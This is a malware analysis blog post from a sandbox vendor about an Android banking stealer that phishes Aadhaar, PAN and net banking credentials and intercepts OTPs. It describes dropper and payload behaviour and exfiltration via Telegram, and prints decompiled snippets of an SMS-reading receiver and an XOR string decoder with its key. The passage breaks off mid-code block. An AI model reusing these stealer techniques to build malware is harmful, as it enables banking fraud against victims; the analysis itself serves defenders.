{"id":12413,"date":"2025-04-01T10:50:42","date_gmt":"2025-04-01T10:50:42","guid":{"rendered":"\/cybersecurity-blog\/?p=12413"},"modified":"2025-04-02T05:49:54","modified_gmt":"2025-04-02T05:49:54","slug":"salvador-stealer-malware-analysis","status":"publish","type":"post","link":"https:\/\/any.run\/cybersecurity-blog\/salvador-stealer-malware-analysis\/","title":{"rendered":"Salvador Stealer: New Android Malware That Phishes Banking Details &amp; OTPs"},"content":{"rendered":"\n<p>In this report, we examine an Android malware sample recently collected and analyzed by our team. This malware masquerades as a banking application and is built to steal sensitive user information. During the analysis, we came across internal references to <strong>&#8220;Salvador,&#8221;<\/strong> so we decided to name it Salvador Stealer.&nbsp;<\/p>\n\n\n\n<p>Real-time visibility into mobile malware behavior is crucial for security teams, SOC analysts, and mobile app providers. This analysis demonstrates how advanced threats can bypass user trust and steal sensitive data, highlighting the need for dynamic malware analysis solutions.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Salvador Stealer Overview&nbsp;<\/h2>\n\n\n\n<p>The collected malware sample is a dropper that delivers a banking stealer masquerading as a legitimate banking app. Its primary goal is to collect sensitive user information, including:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Registered mobile number&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Aadhaar number&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>PAN card details&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Date of birth&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Net banking user ID and password&nbsp;<\/li>\n<\/ul>\n\n\n\n<p>It embeds a phishing website inside the <a href=\"https:\/\/any.run\/cybersecurity-blog\/android-malware-analysis\/\" target=\"_blank\" rel=\"noreferrer noopener\">Android application<\/a> to trick users into entering their credentials. Once submitted, the stolen data is immediately sent to both the phishing site and a C2 server controlled via Telegram.&nbsp;<\/p>\n\n\n\n<p>In this technical breakdown, we\u2019ll walk you through how this malware operates, how it maintains persistence, and how it exfiltrates sensitive data in real time.&nbsp;<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Key Takeaways&nbsp;<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Multi-Stage Attack Chain:<\/strong>&nbsp;Salvador Stealer uses a two-stage infection process \u2014 a dropper APK that installs and launches the actual banking stealer payload.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Phishing-Based Credential Theft:<\/strong>&nbsp;The malware embeds a phishing website within the Android app to collect sensitive personal and banking information, including Aadhaar number, PAN card, and net banking credentials.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Real-Time Data Exfiltration:<\/strong>&nbsp;Stolen credentials are immediately sent to both a phishing server and a Command and Control (C2) server via <a href=\"https:\/\/any.run\/cybersecurity-blog\/intercept-stolen-data-in-telegram\/\" target=\"_blank\" rel=\"noreferrer noopener\">Telegram Bot API<\/a>.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>SMS Interception &amp; OTP Theft:<\/strong>&nbsp;Salvador Stealer abuses SMS permissions to capture incoming OTPs and banking verification codes, helping attackers bypass two-factor authentication.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Multiple Exfiltration Channels:<\/strong>&nbsp;The malware forwards stolen SMS data via dynamic SMS forwarding and HTTP POST requests, ensuring data reaches the attacker even if one channel fails.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Persistence Mechanisms:<\/strong>&nbsp;Salvador Stealer automatically <a href=\"https:\/\/any.run\/cybersecurity-blog\/6-persistence-mechanisms-in-malware\/\" target=\"_blank\" rel=\"noreferrer noopener\">restarts itself<\/a> if stopped and survives device reboots by registering system-level broadcast receivers.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Exposed Infrastructure:<\/strong>&nbsp;During analysis, we found the phishing infrastructure and admin panel publicly accessible, exposing an attacker\u2019s WhatsApp contact, suggesting a possible link to India.&nbsp;<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Malware Behavior Analysis&nbsp;<\/h2>\n\n\n\n<p>To uncover the full behavior of Salvador Stealer and observe its actions in real time, we executed the sample inside&nbsp;<a href=\"http:\/\/app.any.run\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=salvador_malware_analysis&amp;utm_term=010425&amp;utm_content=linktoregistration#register\/\" target=\"_blank\" rel=\"noreferrer noopener\">ANY.RUN\u2019s new Android sandbox.<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/app.any.run\/tasks\/fe800ccb-fccc-42a6-a11d-a3d2b6e89edf\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=salvador_malware_analysis&amp;utm_term=010425&amp;utm_content=linktoservice\" target=\"_blank\" rel=\"noreferrer noopener\">View the full analysis session<\/a>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"578\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/analysisofsalvador-1024x578.png\" alt=\"\" class=\"wp-image-12433\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/analysisofsalvador-1024x578.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/analysisofsalvador-300x169.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/analysisofsalvador-768x433.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/analysisofsalvador-1536x867.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/analysisofsalvador-370x209.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/analysisofsalvador-270x152.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/analysisofsalvador-740x418.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/analysisofsalvador.png 1852w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Analysis of the Salvador malware inside ANY.RUN Sandbox&#8217;s interactive Android VM<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>This interactive environment allowed us to quickly analyze the malware\u2019s behavior, visualize its activity, and identify key indicators, all while saving significant analysis time.&nbsp;<\/p>\n\n\n\n<!-- Regular Banner START -->\n<div class=\"regular-banner\">\n<!-- Text Content -->\n<p class=\"regular-banner__text\">\nDon&#8217;t risk your company&#8217;s systems, <br>open suspicious files and URLs inside <span class=\"highlight\">ANY.RUN Sandbox<\/span>&nbsp;   \n<\/p>\n<!-- CTA Link -->\n<a class=\"regular-banner__link\" id=\"article-banner-regular\" href=\"http:\/\/app.any.run\/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=salvador_malware_analysis&#038;utm_term=010425&#038;utm_content=linktoregistration#register\/\" rel=\"noopener\" target=\"_blank\">\nSign up with business email\n<\/a>\n<\/div>\n<!-- Regular Banner END -->\n<!-- Regular Banner Styles START -->\n\n<style>\n.regular-banner {\ndisplay: flex;\ntext-align: center;\nflex-direction: column;\nalign-items: center;\ngap: 1.5rem;\nwidth: 100%;\npadding: 2rem;\nmargin: 1.5rem 0;\nborder-radius: 0.5rem;\nfont-family: 'Catamaran Bold';\nmargin-inline: auto;\nbackground: rgba(32, 168, 241, 0.1);\nborder: 1px solid rgba(75, 174, 227, 0.32);\n}\n\n.regular-banner__text {\nfont-size: 1.5rem;\nmargin: 0;\n}\n\n.highlight {\ncolor: #ea2526;\n}\n\n.regular-banner__link {\npadding: 0.5rem 1.5rem;\nfont-weight: 500;\ntext-decoration: none;\nborder-radius: 0.5rem;\ncolor: #FFFFFF;\nbackground-color: #1491D4;\ntext-align: center;\ntransition: all 0.2s ease-in;\n}\n\n.regular-banner__link:hover {\nbackground-color: #68CBFF;\ncolor: white;\n}\n<\/style>\n<!-- Regular Banner Styles END -->\n\n\n\n<h2 class=\"wp-block-heading\">Malware Structure&nbsp;<\/h2>\n\n\n\n<p>The malware consists of two key components:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Dropper APK<\/strong>&nbsp;\u2013 Installs and triggers the second-stage payload.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Base.apk (Payload)<\/strong>&nbsp;\u2013 The actual banking credential stealer responsible for data theft.&nbsp;<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">Dropper APK Behavior&nbsp;<\/h3>\n\n\n\n<p>The dropper APK is designed to silently install and execute the malicious payload. To enable this, it declares specific permissions and intent filters in its&nbsp;AndroidManifest.xml, including:&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"288\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/imagec-1024x288.png\" alt=\"\" class=\"wp-image-12435\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/imagec-1024x288.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/imagec-300x84.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/imagec-768x216.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/imagec-1536x432.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/imagec-370x104.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/imagec-270x76.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/imagec-740x208.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/imagec.png 1872w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>AndroidManifest.xml<\/em><\/figcaption><\/figure><\/div>\n\n\n<pre class=\"wp-block-code\"><code style=\"white-space: wrap\">&lt;uses-permission android:name=\"android.permission.REQUEST_INSTALL_PACKAGES\"\/> <br><br>And  <br><br>&lt;intent-filter> <br><br>  &lt;action android:name=\"com.example.android.apis.content.SESSION_API_PACKAGE_INSTALLED\" android:exported=\"true\"\/> <br><br>&lt;\/intent-filter> <\/code><\/pre>\n\n\n\n<p>This behavior was clearly observed in our sandbox environment, where the malware launched a new activity immediately after execution.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"732\" height=\"554\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/imaged.png\" alt=\"\" class=\"wp-image-12436\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/imaged.png 732w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/imaged-300x227.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/imaged-370x280.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/imaged-270x204.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/imaged-80x60.png 80w\" sizes=\"(max-width: 732px) 100vw, 732px\" \/><figcaption class=\"wp-element-caption\"><em>The dropper APK designed to install and launch a secondary payload (base.apk) as a new activity<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>If we open the initial dropper APK using WinRAR, we can see base.apk, which serves as the actual malicious payload. The dropper APK is responsible for dropping and launching this payload without the victim\u2019s knowledge.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"767\" height=\"111\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/imagee.png\" alt=\"\" class=\"wp-image-12438\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/imagee.png 767w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/imagee-300x43.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/imagee-370x54.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/imagee-270x39.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/imagee-740x107.png 740w\" sizes=\"(max-width: 767px) 100vw, 767px\" \/><figcaption class=\"wp-element-caption\"><em>Base.apk displayed inside the initial dropper APK using WinRAR<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>Once executed,&nbsp;base.apk&nbsp;exhibits several key behaviors:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>It establishes a connection to&nbsp;<strong>Telegram<\/strong>, which the attackers use as a&nbsp;Command and Control (C2) server&nbsp;to receive stolen data and manage the infection.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>It triggers the signature&nbsp;<strong>&#8220;Starts itself from another location,&#8221;<\/strong>&nbsp;confirming that it was dropped and launched by the initial dropper APK rather than being installed directly.&nbsp;<\/li>\n<\/ul>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"725\" height=\"496\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image12.png\" alt=\"\" class=\"wp-image-12440\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image12.png 725w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image12-300x205.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image12-370x253.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image12-270x185.png 270w\" sizes=\"(max-width: 725px) 100vw, 725px\" \/><figcaption class=\"wp-element-caption\"><em>Process communicating with Telegram revealed inside ANY.RUN Android sandbox<\/em><\/figcaption><\/figure><\/div>\n\n\n<h2 class=\"wp-block-heading\">Phishing Interface &amp; Data Theft&nbsp;&nbsp;<\/h2>\n\n\n\n<p>The Salvador Stealer tricks users into entering their banking credentials through a fake banking interface phishing page embedded in the app.&nbsp;<\/p>\n\n\n\n<p>Once the user submits their credentials, the data is immediately sent to both the C2 server and a Telegram bot.&nbsp;<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Step 1: Collecting Personal Information<\/h3>\n\n\n\n<p>On the first page, the app prompts the user to enter:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Registered mobile number&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Aadhaar number&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>PAN card details&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Date of birth&nbsp;<\/li>\n<\/ul>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"356\" height=\"585\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image.png\" alt=\"\" class=\"wp-image-12414\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image.png 356w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image-183x300.png 183w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image-270x444.png 270w\" sizes=\"(max-width: 356px) 100vw, 356px\" \/><figcaption class=\"wp-element-caption\"><em>The interface of the fake banking app displayed inside ANY.RUN Android sandbox<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>Once this information is submitted, it is immediately sent to:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>A phishing website controlled by the attacker&nbsp;<\/li>\n<\/ul>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"623\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image18-1024x623.png\" alt=\"\" class=\"wp-image-12443\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image18-1024x623.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image18-300x182.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image18-768x467.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image18-370x225.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image18-270x164.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image18-740x450.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image18.png 1051w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Stolen data sent to phishing site<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<ul class=\"wp-block-list\">\n<li>A&nbsp;Telegram bot&nbsp;used as part of the malware&#8217;s C2 infrastructure&nbsp;<\/li>\n<\/ul>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"623\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image11-1024x623.png\" alt=\"\" class=\"wp-image-12445\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image11-1024x623.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image11-300x182.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image11-768x467.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image11-370x225.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image11-270x164.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image11-740x450.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image11.png 1046w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Stolen data sent to Telegram C2 server<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<h3 class=\"wp-block-heading\">Step 2: Stealing Banking Credentials&nbsp;<\/h3>\n\n\n\n<p>On the next stage, the app asks the user to provide:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Net banking user ID&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Password&nbsp;<\/li>\n<\/ul>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"353\" height=\"585\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image1a.png\" alt=\"\" class=\"wp-image-12449\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image1a.png 353w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image1a-181x300.png 181w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image1a-270x447.png 270w\" sizes=\"(max-width: 353px) 100vw, 353px\" \/><figcaption class=\"wp-element-caption\"><em>Banking credentials provided to cyber attackers<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>This data is also exfiltrated to both the phishing server and the Telegram bot. We can see this easily inside ANY.RUN Android sandbox: &nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"625\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image14-1024x625.png\" alt=\"\" class=\"wp-image-12451\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image14-1024x625.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image14-300x183.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image14-768x469.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image14-370x226.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image14-270x165.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image14-740x452.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image14.png 1044w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Stolen data sent to phishing site<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>These credential theft attempts were clearly captured in the&nbsp;HTTP request logs&nbsp;during sandbox analysis.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"624\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image1e-1024x624.png\" alt=\"\" class=\"wp-image-12453\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image1e-1024x624.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image1e-300x183.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image1e-768x468.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image1e-370x226.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image1e-270x165.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image1e-740x451.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image1e.png 1045w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Stolen data sent to Telegram C2 server<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>By enabling&nbsp;HTTPS MITM Proxy mode&nbsp;in <a href=\"http:\/\/app.any.run\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=salvador_malware_analysis&amp;utm_term=010425&amp;utm_content=linktoregistration#register\/\">ANY.RUN\u2019s Android sandbox<\/a>, we were able to intercept and verify the exfiltration of user data in real time.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"213\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image1f-1024x213.png\" alt=\"\" class=\"wp-image-12455\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image1f-1024x213.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image1f-300x63.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image1f-768x160.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image1f-370x77.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image1f-270x56.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image1f-740x154.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image1f.png 1128w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Credential theft attempts captured in the&nbsp;HTTP request logs<\/em><\/figcaption><\/figure><\/div>\n\n\n<h2 class=\"wp-block-heading\">Technical Analysis&nbsp;<\/h2>\n\n\n\n<p>The&nbsp;<strong>base.apk<\/strong>&nbsp;file embedded in the dropper APK contains the core malicious functionality of Salvador Stealer.&nbsp;Here&#8217;s a detailed look at its structure&nbsp;&nbsp;<br>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"471\" height=\"588\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image-2.png\" alt=\"\" class=\"wp-image-12417\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image-2.png 471w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image-2-240x300.png 240w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image-2-370x462.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image-2-270x337.png 270w\" sizes=\"(max-width: 471px) 100vw, 471px\" \/><figcaption class=\"wp-element-caption\"><em>Base.apk file structure<\/em><\/figcaption><\/figure><\/div>\n\n\n<p><em>Encrypted Strings &amp; Obfuscation<\/em>&nbsp;<\/p>\n\n\n\n<p>We\u2019ll begin by opening one of the Java files to analyze its contents. Let&#8217;s start with Earnestine.java.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code style=\"white-space: pre-wrap;\">public class Earnestine extends BroadcastReceiver { \n\n    private static final Map&lt;String, StringBuilder&gt; sdghedy = new ConcurrentHashMap(); \n\n \n\n    @Override \/\/ android.content.BroadcastReceiver \n\n    public void onReceive(Context context, Intent intent) { \n\n        Object&#91;] pdus; \n\n        if (intent.getAction().equals(NPStringFog.decode(\"0F1E09130108034B021C1F1B080A04154B260B1C0811060E091C5C3D3D3E3E3C2424203B383529\")) &amp;&amp; (pdus = (Object&#91;]) intent.getExtras().get(NPStringFog.decode(\"1E141812\"))) != null) { \n\n            for (Object pdu : pdus) { \n\n... &nbsp;<\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<p>We can see that the strings are encrypted using a custom method. The decryption is performed using NPStringFog.decode(&#8230;), defined in the NPStringFog.java class. &nbsp;<\/p>\n\n\n\n<p>Let\u2019s examine that next to understand what type of encryption is used.&nbsp;<\/p>\n\n\n\n<p>Opening NPStringFog.java, we can confirm that it implements XOR decryption using a static key: &#8220;npmanager&#8221;.&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code style=\"white-space: pre-wrap\">package obfuse; \n \nimport java.io.ByteArrayOutputStream; \n \npublic class NPStringFog { \n    public static String KEY = \"npmanager\";  \/\/ XOR key \n    private static final String hexString = \"0123456789ABCDEF\";  \/\/ Hexadecimal string for conversion \n \n    public static String decode(String str) { \n        ByteArrayOutputStream baos = new ByteArrayOutputStream(str.length() \/ 2); \n         \n        \/\/ Convert hex string to byte array \n        for (int i = 0; i &lt; str.length(); i += 2) { \n            baos.write((hexString.indexOf(str.charAt(i)) &lt;&lt; 4) | hexString.indexOf(str.charAt(i + 1))); \n        } \n         \n        byte&#91;] b = baos.toByteArray(); \n        int len = b.length; \n        int keyLen = KEY.length(); \n         \n        \/\/ XOR decryption \n        for (int i2 = 0; i2 &lt; len; i2++) { \n            b&#91;i2] = (byte) (b&#91;i2] ^ KEY.charAt(i2 % keyLen));  \/\/ XOR byte with key \n        } \n         \n        return new String(b); \n    } \n} <\/code><\/pre>\n\n\n\n<p>This confirms that the encryption is XOR-based. Using CyberChef, we can manually decode strings like the one found in Earnestine:&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"490\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image21-1024x490.png\" alt=\"\" class=\"wp-image-12459\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image21-1024x490.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image21-300x144.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image21-768x367.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image21-1536x735.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image21-370x177.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image21-270x129.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image21-740x354.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image21.png 1919w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Decoding strings with the help of CyberChef<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>Cyberchef rule:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code style=\"white-space: 